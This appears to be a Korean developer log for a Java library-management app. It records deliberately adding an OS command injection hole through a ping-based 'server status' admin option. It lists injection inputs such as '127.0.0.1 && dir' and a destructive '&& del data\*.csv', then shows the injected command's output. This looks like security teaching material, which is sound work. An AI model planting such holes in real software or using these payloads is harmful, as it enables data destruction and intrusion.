OS Command Injection 취약점 개발

[sumannam]

관리자 메뉴에서 서버 상태 확인 기능 개발

기존 메뉴

===========================================================
          [ 관리자 전용 메뉴 ]
===========================================================
  1. 도서 등록 (Add)
  2. 도서 수정 및 삭제 (Edit/Delete)
  5. 전체 도서 목록 (List)
  6. 도서 검색 (Search)
  0. 종료 (Exit)

수정 메뉴

===========================================================
          [ 관리자 전용 메뉴 ]
===========================================================
  1. 도서 등록 (Add)
  2. 도서 수정 및 삭제 (Edit/Delete)
  5. 전체 도서 목록 (List)
  6. 도서 검색 (Search)
  9. 서버 상태 확인(Check)
  0. 종료 (Exit)

[sumannam]

공격 시도: IP 입력란에 아래와 같이 명령어 구분자를 섞어서 입력해 봅니다.

Windows: 127.0.0.1 && dir (현재 폴더의 모든 파일을 보여줌)

Linux: 127.0.0.1; ls -al
파괴적인 공격: 127.0.0.1 && del data\*.csv (데이터 파일을 삭제함)

[sumannam]

현재 개발 환경은 Windows라서 아래와 같이 입력 필요

192.168.100.20 && dir

실행 예시

[서버 네트워크 진단]
- 접속을 확인 할 IP 주소를 입력하세요: 192.168.100.20 && dir
[시스템 실행 명령어]: cmd.exe /c ping -n 1 192.168.100.20 && dir

Ping 192.168.100.20 32바이트 데이터 사용:
192.168.100.20의 응답: 바이트=32 시간<1ms TTL=64

192.168.100.20에 대한 Ping 통계:
    패킷: 보냄 = 1, 받음 = 1, 손실 = 0 (0% 손실),
왕복 시간(밀리초):
    최소 = 0ms, 최대 = 0ms, 평균 = 0ms
 D 드라이브의 볼륨: 새 볼륨
 볼륨 일련 번호: 3C95-FC21

 D:\Git\java\LibraryManagement_v1.2 디렉터리

2026-01-26  오전 07:36    <DIR>          .
2026-01-26  오전 06:53    <DIR>          ..
2026-01-19  오전 06:36               372 .gitignore
2026-02-05  오후 01:56    <DIR>          .idea
2026-01-26  오전 06:52    <DIR>          docs
2026-01-26  오전 07:08    <DIR>          lib
2026-01-26  오전 07:11             1,783 LibraryManagement_v2.0.iml
2026-01-26  오전 06:52    <DIR>          out
2026-02-05  오후 01:56    <DIR>          src
2026-02-02  오전 07:09    <DIR>          test
               2개 파일               2,155 바이트
               8개 디렉터리  24,685,682,688 바이트 남음